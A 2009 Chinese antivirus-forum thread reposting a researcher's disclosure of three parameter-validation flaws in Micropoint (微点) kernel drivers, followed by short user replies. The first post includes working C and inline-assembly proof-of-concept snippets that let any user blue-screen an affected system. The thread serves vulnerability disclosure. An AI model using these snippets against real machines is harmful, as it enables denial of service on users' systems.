jkok20
中级用户
积分 333
发帖 330
注册 2008-11-22
|
#1 微点漏洞
作者:MJ0011
继续爆三个漏洞,微点一直没反映啊~看来都度假去了 这样可不行啊 病毒木马可是不休假的哦 O(∩_∩)O哈哈~
(1).微点对NtWriteFile-> Call ObReferenceObjectByHandle的HOOK中未对参数做有效性检查,可导致任意权限用户在安装了微点的系统上可引发系统蓝屏
存在漏洞的文件:mp110011.sys,版本:1.2.10237,CheckSum = 0x0002291a , TimeStamp = 0x488944d9
微点hook了NtWriteFile-> Call ObReferenceObjectByHandle并对其中的FileHandle进行检查,检查对应的设备对象->驱动对象是否是Disk,如果是的话,判断写入的偏移,进行阻截或放行
其中hook函数使用读取外层函数(NtWriteFile)保存的栈指针(ebp)来读取外层函数的参数pByteOffset,但未对该参数做有效性检查,就直接使用,导致了攻击的可能
使用以下代码即可在任意用户权限在使安装了微点的系统蓝屏:
HMODULE hlib = LoadLibrary("ntdll.dll" ;
PVOID p = GetProcAddress(hlib , "ZwWriteFile";
HANDLE hfile = CreateFile("\\\\.\\PhysicalDrive0" , FILE_WRITE_DATA , 0 , 0 , OPEN_EXISTING , 0 , 0 );
if (hfile != INVALID_HANDLE_VALUE)
{
__asm
{
push 0
push 1 //->pByteOffset,cannot be zero
push 0
push 0
push 0
push 0
push 0
push 0
push hfile
call p
}
}
(2).微点在对NtOpenProcess的头部inline hook中,未进行任何参数检查就直接使用参数,导致任意权限用户可引发安装了微点的系统蓝屏
mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)
在其处理函数中未做任何参数检查,直接使用了参数pClientId 的缓存地址,也没有结构化异常处理,因此直接传递0地址即可使系统蓝屏
测试代码:
HMODULE hlib = LoadLibrary("ntdll.dll";
PVOID p = GetProcAddress(hlib , "NtOpenProcess";
__asm{
push 0
push 0
push 1 //access must have "PROCESS_TERMINATE"
push 0
call p
}
(3).微点对于NtCreateThread的HOOK处理中存在拒绝服务漏洞,可导致任何权限用户在安装了微点的系统上引发蓝屏
mp110013.sys(版本1.2.10126.0, CheckSum = 0x0000FDB7 , TimeStamp = 0x4859C30E)
在其函数中未对参数pContext做任何检查,就使用该参数,并且没有使用任何结构化异常处理,因此只要传0就可以导致蓝屏
测试代码:
HMODULE hlib = LoadLibrary("ntdll.dll";
PVOID p = GetProcAddress(hlib , "NtCreateThread";
__asm{
push 1 //need createsuspend
push 0
push 0
push 0
push 0
push 0
push 0
push 0
call p
}
| |
※ ※ ※ 本文纯属【jkok20】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
[url]http://www.dggdwl.com[/url]
[br]出售微点主动防御。[/br]150元 3年3用户!! |
|
|
2009-10-26 00:43 |
|
wwwwqqqq
注册用户
积分 66
发帖 64
注册 2009-7-29
|
#2
这不能说明漏洞
| |
※ ※ ※ 本文纯属【wwwwqqqq】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2009-10-26 07:09 |
|
镜湖YES
银牌会员
积分 1225
发帖 1199
注册 2009-3-15
|
#3
MJ0011这个家伙在网络上红的很,自称是中国内核第一人。现就职在360,话说360把冰刃和狙剑的作者都招至麾下了。360很有人才的,(难怪软件都那么流氓)。
楼主呀!这个漏洞好早就报过了。
| |
※ ※ ※ 本文纯属【镜湖YES】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2009-10-26 07:14 |
|
1328558
注册用户
积分 55
发帖 55
注册 2008-8-9
|
#4
学习学习
| |
※ ※ ※ 本文纯属【1328558】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2009-10-26 09:45 |
|
mj0011_2
禁止发言
积分 86
发帖 109
注册 2008-12-14
|
#5
去年10.1报的漏洞~
| |
※ ※ ※ 本文纯属【mj0011_2】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2009-10-26 18:55 |
|
eddysu
银牌会员
积分 1573
发帖 1579
注册 2008-8-31
|
#6
看不懂,呵呵。
| |
※ ※ ※ 本文纯属【eddysu】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
我用微点! |
|
|
|
2009-10-26 19:25 |
|
lgjlgj
高级用户
积分 990
发帖 990
注册 2008-8-30
|
#7
基本上都是360报漏洞而微点不报
| |
※ ※ ※ 本文纯属【lgjlgj】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
八掌柜 |
|
|
|
2009-10-26 20:33 |
|
lxy95951
注册用户
积分 161
发帖 159
注册 2010-3-5
|
#8
我在卡饭上也看到了这篇,怎么不见老大说明,虽然不需要理或者口水,至少要让我门守这的心中有数啊·
| |
※ ※ ※ 本文纯属【lxy95951】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
|
|
|
|
2011-12-1 11:33 |
|
